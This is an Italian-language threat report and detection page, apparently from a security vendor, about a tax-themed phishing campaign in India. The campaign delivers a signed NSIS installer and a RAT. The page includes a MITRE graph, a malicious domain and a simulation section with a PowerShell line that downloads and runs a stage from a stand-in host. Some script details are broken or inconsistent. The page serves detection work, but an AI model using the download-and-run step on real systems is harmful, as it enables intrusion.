Segui
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Un’operazione di phishing che imita il Dipartimento delle Imposte sul Reddito indiano consegna un PDF trappola che conduce i destinatari a un portale di conformitĂ contraffatto. Il sito invita le vittime a scaricare un pacchetto ZIP contenente un installer NSIS firmato, che poi distribuisce un Trojan di Accesso Remoto multi-fase. Il RAT persiste creando un servizio Windows e comunica con piĂą server C2 su porte non standard.
Indagine
I ricercatori hanno analizzato l’esca del PDF, l’URL incorporato e il flusso di lavoro concatenato dell’installer NSIS. Hanno documentato i binari rilasciati su disco, la creazione di una cartella di installazione nascosta e la registrazione di NSecRTS.exe come un servizio di Windows. Il report ha anche catturato le comunicazioni in uscita verso tre indirizzi IP e ha evidenziato l’uso di payload firmati lungo tutta la catena di distribuzione.
Mitigazione
Blocca il dominio malevolo e gli indirizzi IP correlati al perimetro e tramite controlli proxy. Rafforza le protezioni email per identificare allegati e link a tema fiscale che portano a portali di conformitĂ simili. Previeni l’esecuzione automatica di installer non affidabili, se possibile, e monitora la creazione di servizi sospetti, specialmente qualsiasi cosa chiamata “Windows Real-time Protection Service.”
Risposta
Genera avvisi sui nomi di file elencati, gli hash e l’attivitĂ di registrazione del servizio Windows legati alla catena di infezione. Isola gli endpoint compromessi, acquisisci immagini di memoria e disco ed esegui una scansione forense completa per identificare eventuali ulteriori stadi RAT o strumenti. Rimuovi gli artefatti di persistenza e reimposta le credenziali potenzialmente esposte per prevenire nuove intrusioni.
graph TB %% Definizioni delle classi classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 classDef file fill:#e6e6e6 %% Nodi – Azioni (Tecniche MITRE) action_phishing_attachment[“<b>Azione</b> – T1566.001: <b>Allegato di Spearphishing</b><br/>Email con PDF malevolo “Review Annexure.pdf” consegnata alla vittima.”] class action_phishing_attachment action action_phishing_link[“<b>Azione</b> – T1566.002: <b>Link di Spearphishing</b><br/>Il PDF contiene un link a un falso portale dell’imposta sul reddito (hxxps://www.akjys.top/).”] class action_phishing_link action action_user_execution[“<b>Azione</b> – T1204.002: <b>Esecuzione da Parte dell’Utente</b><br/>La vittima fa clic sul link, il file ZIP viene scaricato automaticamente e l’installer viene eseguito.”] class action_user_execution action action_code_signing[“<b>Azione</b> – T1553.002: <b>Firma del Codice</b><br/>Installer NSIS firmati con certificati dall’aspetto legittimo.”] class action_code_signing action action_signed_binary_proxy[“<b>Azione</b> – T1218: <b>Esecuzione tramite Binario Firmato</b><br/>L’installer NSIS firmato avvia il payload malevolo aggirando i controlli di sicurezza.”] class action_signed_binary_proxy action action_obfuscation[“<b>Azione</b> – T1027.002: <b>Impacchettamento del Software</b><br/>Wrapper NSIS multi-stadio cifrano e nascondono i binari malevoli.”] class action_obfuscation action action_persistence_service_perm[“<b>Azione</b> – T1574.010: <b>Debolezza nelle Autorizzazioni dei File di Servizio</b><br/>L’installer modifica le autorizzazioni dei file di servizio.”] class action_persistence_service_perm action action_persistence_service[“<b>Azione</b> – T1569.002: <b>Esecuzione di Servizio</b><br/>Registra NSecRTS.exe come servizio Windows “Windows Real-time Protection Service”.”] class action_persistence_service action action_discovery_system[“<b>Azione</b> – T1082: <b>Raccolta di Informazioni di Sistema</b><br/>Il RAT raccoglie la versione del sistema operativo e i dettagli hardware.”] class action_discovery_system action action_discovery_software[“<b>Azione</b> – T1518: <b>Rilevamento del Software</b><br/>Il RAT enumera applicazioni e servizi installati e memorizza i dati in C:\Program Files\Common Files\NSEC\Data.”] class action_discovery_software action action_c2_web[“<b>Azione</b> – T1071.001: <b>Protocolli Web</b><br/>Comunicazione C2 tramite HTTP/HTTPS.”] class action_c2_web action action_c2_nonstandard[“<b>Azione</b> – T1571: <b>Porta Non Standard</b><br/>Utilizza le porte 48991, 48992 e 3898 per il traffico C2.”] class action_c2_nonstandard action action_c2_bidirectional[“<b>Azione</b> – T1102.002: <b>Servizio Web Bidirezionale</b><br/>Consente comunicazione bidirezionale con il server.”] class action_c2_bidirectional action action_remote_access[“<b>Azione</b> – T1219: <b>Strumenti di Accesso Remoto</b><br/>L’attaccante esegue comandi, esfiltra dati e mantiene il controllo.”] class action_remote_access action action_exfiltration_scheduled[“<b>Azione</b> – T1029: <b>Trasferimento Programmato</b><br/>I dati raccolti vengono inviati periodicamente via POST al server C2.”] class action_exfiltration_scheduled action action_defense_evasion[“<b>Azione</b> – T1070.004: <b>Eliminazione dei File</b><br/>Il loader rimuove i file rilasciati e le cartelle temporanee dopo l’esecuzione.”] class action_defense_evasion action action_multi_stage[“<b>Azione</b> – T1104: <b>Canali Multi-Stadio</b><br/>Installer successivi distribuiscono il payload finale del RAT.”] class action_multi_stage action %% Nodi – Strumenti / File / Malware tool_nsis_installer[“<b>Strumento</b> – <b>Nome</b>: Installer NSIS<br/><b>Descrizione</b>: Installer firmato utilizzato per avviare il payload.”] class tool_nsis_installer tool malware_rat[“<b>Malware</b> – <b>Nome</b>: NSEC RAT<br/><b>Descrizione</b>: Trojan di accesso remoto che fornisce controllo completo del sistema.”] class malware_rat malware file_pdf[“<b>File</b> – <b>Nome</b>: Review Annexure.pdf<br/><b>Tipo</b>: Allegato PDF malevolo.”] class file_pdf file file_zip[“<b>File</b> – <b>Nome</b>: Review Annexure.zip<br/><b>Tipo</b>: Archivio contenente l’installer NSIS.”] class file_zip file file_exe[“<b>File</b> – <b>Nome</b>: NSecRTS.exe<br/><b>Tipo</b>: Eseguibile di servizio registrato in Windows.”] class file_exe file %% Connessioni – Flusso di Attacco action_phishing_attachment –>|contiene| file_pdf file_pdf –>|collega a| action_phishing_link action_phishing_link –>|porta a| file_zip file_zip –>|eseguito da| action_user_execution action_user_execution –>|utilizza| tool_nsis_installer tool_nsis_installer –>|firmato con| action_code_signing action_code_signing –>|abilita| action_signed_binary_proxy action_signed_binary_proxy –>|offusca tramite| action_obfuscation action_obfuscation –>|crea| malware_rat malware_rat –>|installato come| action_persistence_service_perm action_persistence_service_perm –>|abilita| action_persistence_service action_persistence_service –>|esegue| file_exe file_exe –>|raccoglie tramite| action_discovery_system file_exe –>|raccoglie tramite| action_discovery_software action_discovery_system –>|invia dati a| action_c2_web action_discovery_software –>|invia dati a| action_c2_web action_c2_web –>|usa porte| action_c2_nonstandard action_c2_web –>|usa canale| action_c2_bidirectional action_c2_bidirectional –>|fornisce| action_remote_access action_remote_access –>|esegue| action_exfiltration_scheduled action_exfiltration_scheduled –>|attiva| action_defense_evasion action_defense_evasion –>|precede| action_multi_stage %% Stili class tool_nsis_installer, file_pdf, file_zip, file_exe tool class malware_rat malware class action_* action
Flusso di attacco
Rilevamenti
Comando e Controllo Sospetto da Richiesta DNS con Dominio di Livello Superiore (TLD) Insolito (via dns)
Visualizza
IOC (DestinationIP) per rilevare: Campagna di Phishing a Tema Fiscale Indiano Mire le Aziende Locali
Visualizza
IOC (SourceIP) per rilevare: Campagna di Phishing a Tema Fiscale Indiano Mire le Aziende Locali
Visualizza
IOC (HashMd5) per rilevare: Campagna di Phishing a Tema Fiscale Indiano Mire le Aziende Locali
Visualizza
Rilevamento dell’Esecuzione di Malware nella Campagna di Phishing a Tema Fiscale Indiano [Creazione Processo Windows]
Visualizza
Rilevamento della Comunicazione C2 di NSecRTS.exe [Connessione di Rete Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-Flight di Telemetria & Baseline deve essere passato.
Motivazione: Questa sezione dettagliatamente l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta attesa dalla logica di rilevamento.
-
Narrativa dell’Attacco & Comandi:
Un avversario consegna un’email di phishing intitolata “Avviso Fiscale”. L’allegato è un documento Word malevolo che rilasciasetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%. La vittima esegue il file, che a sua volta generaSibuia.exe(il vero payload) come suo figlio. Questa catena padre‑figlio è progettata per bypassare gli avvisi di creazione di processi generici ma viene catturata dalla regola Sigma.Passaggi eseguiti sull’host compromesso:
- Rilascia il binario di primo stadio:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Esegui il binario di primo stadio:
Start-Process -FilePath $stage1 -NoNewWindow - Il binario di primo stadio crea internamente il binario di secondo stadio
Sibuia.exenella stessa directory e lo avvia: (Simulato dallo script di test qui sotto.)
- Rilascia il binario di primo stadio:
-
Script di Test sui Regressi:
Lo script qui sotto riproduce la esatta relazione genitore‑figlio richiesta per attivare la regola.# ------------------------------------------------- # Simulazione di catena di phishing Fiscale-Indiano # ------------------------------------------------- # Define paths $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Create dummy binaries (zero‑byte – sufficient for Sysmon logging) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # Ensure files are executable (Windows does not need chmod) Write-Host "[*] Launching stage1..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Give stage1 a moment to “spawn” stage2 (simulated by direct launch) Start-Sleep -Milliseconds 500 Write-Host "[*] Stage1 spawning stage2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Simulation complete. Verify detection in SIEM." # ------------------------------------------------- -
Comandi di Pulizia:
Rimuovi gli artefatti e termina eventuali processi residui.# Stop any leftover processes Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Delete files Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Cleanup complete."